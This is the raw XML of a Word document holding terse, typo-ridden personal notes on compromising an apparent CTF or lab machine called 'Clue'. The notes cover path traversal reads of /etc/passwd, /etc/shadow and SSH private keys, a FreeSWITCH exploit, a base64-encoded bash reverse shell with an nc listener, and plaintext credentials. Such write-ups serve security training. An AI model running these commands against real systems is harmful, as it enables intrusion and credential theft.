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F443B94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200AF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Clue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151B754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E6F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E6F02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CE6F02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E6F02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CE6F02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CE6F02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CE6F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E6F02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0A4B0A96" w14:textId="6C7CEC1C" w:rsidR="00BB61EF" w:rsidRDefault="00BB61EF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‘’ -p ‘’ - -shares</w:t>
      </w:r>
      <w:r w:rsidR="006E6C55">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = read </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006E6C55">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>brekup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7782885D" w14:textId="0106EB89" w:rsidR="006E6C55" w:rsidRDefault="006E6C5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mount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cifs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-o “username=’’,password=’’” //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3D51AA81" w14:textId="44FBE935" w:rsidR="006E6C55" w:rsidRDefault="00C5108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download it </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052D07C6" w14:textId="4424737D" w:rsidR="00C51085" w:rsidRDefault="00C5108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cossadra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again Cassandra  = open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yaml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52946">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> with less</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABD25BC" w14:textId="55486CB0" w:rsidR="00152946" w:rsidRDefault="0015294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notice the username and password is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cassadra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278437A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same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freeswitch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3AC1781C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grep -Ri password = it grep it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B29AD61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 with :3000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78ED2898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there has the version so find exploit of it = exploit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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3B3E90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that file it said that 8 time ../ and then payload and its path traversal </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DBF128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obtain request in burp suit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BF5304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../(8)/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/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE07EDE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../(8)/proc/self/environ = see files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716FF040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in Cassandra = tree .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E60ACC6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know that its show the default password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD12CEE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../(8)/proc/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srlf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cmdline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notice the username and password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB569D3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ssh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cassie@t_ip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be its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denie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="46A98271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then look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freeswitch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exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFE0B21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that we see the default password which is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cluecon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7FFDE845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all and past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</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4AC4A5DD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+x it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751BE06E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id = again we failed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497DD14C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again at the password list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD33BD4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grep password there has mostly 4 files cat each we obtain StrongClueEight021</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AB3173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change that password into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freeswitch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0694BEF4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run it </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136E56A2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id = we obtain the id info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9253608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for reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2396D216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-n ‘bash -I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/9999 0&gt;&amp;1’ |base64 -w0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C064F29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exploit.py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“echo paste | base64 -d |bash”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4917C870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run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nc-lvnp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9999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307143EF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not then do for 80 port </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0447FA19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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5852557E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have the credentials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cassie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="69A69664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cassie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paste password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cassie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="36E46F71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there has .ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74941837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id_rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7071F1D6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id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paste</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E578252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600 it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2F6D10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id_rsa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@t_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C77E085" w14:textId="77777777" w:rsidR="00D232B4" w:rsidRDefault="00D232B4" w:rsidP="00D232B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7. Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53964688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= we notice /Cassandra-Web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471CA593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path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3108CDE6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path -B 0.0.0.0:7777 -u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cassie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SecondBitTheApple33 &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CFADB2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curl - -path-as-is http://localhost:7777../../../../../../../etc/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4767E4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curl - -path-as-is </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="001B623A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://localhost:7777../../../../../../../home/anthony/.ssh.id_rsa</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="21699B0E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it and paste in terminal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600 it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6E1A10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anthony@t_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="79EAB791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but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 so just try root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C913B46" w14:textId="77777777" w:rsidR="005F24A2" w:rsidRDefault="005F24A2" w:rsidP="005F24A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root@t_ip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and its done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05403CC1" w:rsidR="00A311DF" w:rsidRPr="005F24A2" w:rsidRDefault="005F24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and we obtain the proof.txt</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00A311DF" w:rsidRPr="005F2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22FC"/>
    <w:rsid w:val="000654C4"/>
    <w:rsid w:val="00092F59"/>
    <w:rsid w:val="000C3180"/>
    <w:rsid w:val="000D64A2"/>
    <w:rsid w:val="00100FFF"/>
    <w:rsid w:val="00152946"/>
    <w:rsid w:val="00210F20"/>
    <w:rsid w:val="003B1174"/>
    <w:rsid w:val="003D7D52"/>
    <w:rsid w:val="00427E37"/>
    <w:rsid w:val="0058645B"/>
    <w:rsid w:val="005A5DD4"/>
    <w:rsid w:val="005D404D"/>
    <w:rsid w:val="005F24A2"/>
    <w:rsid w:val="006E6C55"/>
    <w:rsid w:val="00751088"/>
    <w:rsid w:val="007A66F7"/>
    <w:rsid w:val="0080220A"/>
    <w:rsid w:val="00843DCE"/>
    <w:rsid w:val="00881399"/>
    <w:rsid w:val="009235B3"/>
    <w:rsid w:val="00A03D8F"/>
    <w:rsid w:val="00A27A74"/>
    <w:rsid w:val="00A311DF"/>
    <w:rsid w:val="00A5666B"/>
    <w:rsid w:val="00A61603"/>
    <w:rsid w:val="00B40193"/>
    <w:rsid w:val="00BA37CE"/>
    <w:rsid w:val="00BB61EF"/>
    <w:rsid w:val="00C200AF"/>
    <w:rsid w:val="00C37152"/>
    <w:rsid w:val="00C51085"/>
    <w:rsid w:val="00CC38B9"/>
    <w:rsid w:val="00CE6AFB"/>
    <w:rsid w:val="00CE6F02"/>
    <w:rsid w:val="00D232B4"/>
    <w:rsid w:val="00F253B6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7777../../../../../../../home/anthony/.ssh.id_r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31</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-25T12:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-31T15:44:00Z</dcterms:modified>
</cp:coreProperties>
</file>